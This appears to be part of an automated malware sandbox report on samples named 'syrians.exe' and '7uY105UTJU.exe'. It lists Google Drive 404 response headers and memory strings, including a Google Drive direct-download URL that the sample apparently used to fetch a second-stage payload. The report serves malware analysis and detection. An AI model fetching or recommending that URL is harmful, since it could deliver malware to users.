https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSActSuqcwsnmHyAwvoDHt1dmJHfRuVSh2ItwTiZcyCoAxUHs_aj5sRV_CoCcMq_Qm40CxVhPEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:26 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-aH5F5hA5MKK08SavGXj1eA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSKWq7rFuaub8P3Wbr1O4CPN_RiKq0pJzIwh34cJeGqKSqg4JQAkgxk-TwMlDymM2KwfcUAceUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-W3sRi92h2xiOzcIrda7Hvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRD2P9-tld17BPA4x6rojvb3EHsaI6EkkZ74h3QufBxin39Eia4efOrLi7LSoy_4X7FContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:31 GMTContent-Security-Policy: script-src 'nonce-NaNaa_Q7W2g9o4Ct25SzZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSpASG6-00-XCKr4aRYxZSiC542y1GZg1XxU41rT2gjgfOEcapmsm2Dj9P00zMHgop9EkpNSSMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Kk11waH5Gb97mblch7yNtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: 7uY105UTJU.exe, syrians.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: syrians.exe, 00000008.00000001.2843443692.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: syrians.exe, 00000008.00000001.2843443692.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: syrians.exe, 00000008.00000001.2843443692.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: syrians.exe, 00000008.00000003.3346992730.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011741668.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034255260.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023539797.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011629852.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346955212.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977951666.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/1
Source: syrians.exe, 00000008.00000003.3279283600.0000000005A15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/DD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download
Source: syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3302389375.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324668665.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346992730.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3127766555.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/DD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadb0
Source: syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3302389375.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324668665.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023589764.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/DD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadider:3
Source: syrians.exe, 00000008.00000003.3104143779.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3127766555.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/DD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadp3
Source: syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3302389375.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324668665.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346992730.0000000005A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/DD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadt&3
Source: syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023589764.0000000005A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/ertificates
Source: syrians.exe, 00000008.00000003.3369526042.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346955212.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357877534.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/r
Source: syrians.exe, 00000008.00000003.3011741668.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011629852.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335257821.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3000456250.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324480588.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977912843.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3000550258.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988720615.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/rg
Source: syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023589764.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/t
Source: syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977951666.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2966271594.0000000005A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/t0
Source: syrians.exe, 00000008.00000003.3240199604.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093015964.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3251750304.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346955212.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977951666.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104081791.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo
Source: syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcboC
Source: syrians.exe, 00000008.00000003.3240199604.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093015964.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3251750304.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104081791.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3262311523.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3229363226.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3251799306.0000000005A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcboEWuxHTM77jDPcbo
Source: syrians.exe, 00000008.00000003.3346955212.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139244148.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335257821.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3150180791.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357877534.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139464915.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324480588.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3150234469.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcboP
Source: syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977951666.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2966271594.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023589764.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcboS
Source: syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2966271594.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2966238182.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955216092.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbog
Source: syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbol
Source: syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977951666.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2966271594.0000000005A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbotk
Source: syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbow
Source: syrians.exe, 00000008.00000003.3240199604.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279222066.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3290217008.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3290162505.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279254655.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3229363226.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069167737.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/w
Source: syrians.exe, 00000008.00000003.3240199604.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3161725858.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3127682738.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011741668.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2943166139.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116259832.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279222066.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3290217008.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034255260.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3369526042.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093015964.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023539797.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3184162821.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011629852.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3184099773.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3251750304.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3217375762.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346955212.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3172628532.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104081791.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download
Source: syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3302389375.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324668665.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346992730.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadP0
